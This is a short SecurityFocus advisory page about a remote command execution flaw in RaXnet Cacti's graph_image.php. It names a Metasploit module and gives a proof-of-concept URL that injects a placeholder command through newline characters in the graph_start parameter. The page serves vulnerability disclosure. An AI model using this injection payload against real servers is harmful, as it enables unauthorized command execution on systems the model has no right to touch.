Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

RaXnet Cacti Graph_Image.PHP Remote Command Execution Vulnerability

An exploit is not required.

A Metasploit exploit cacti_graphimage_exec.pm is available:

The following proof of concept examples are available:
http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&gr
aph_start=%0a[command]%0a







 

Privacy Statement
Copyright 2009, SecurityFocus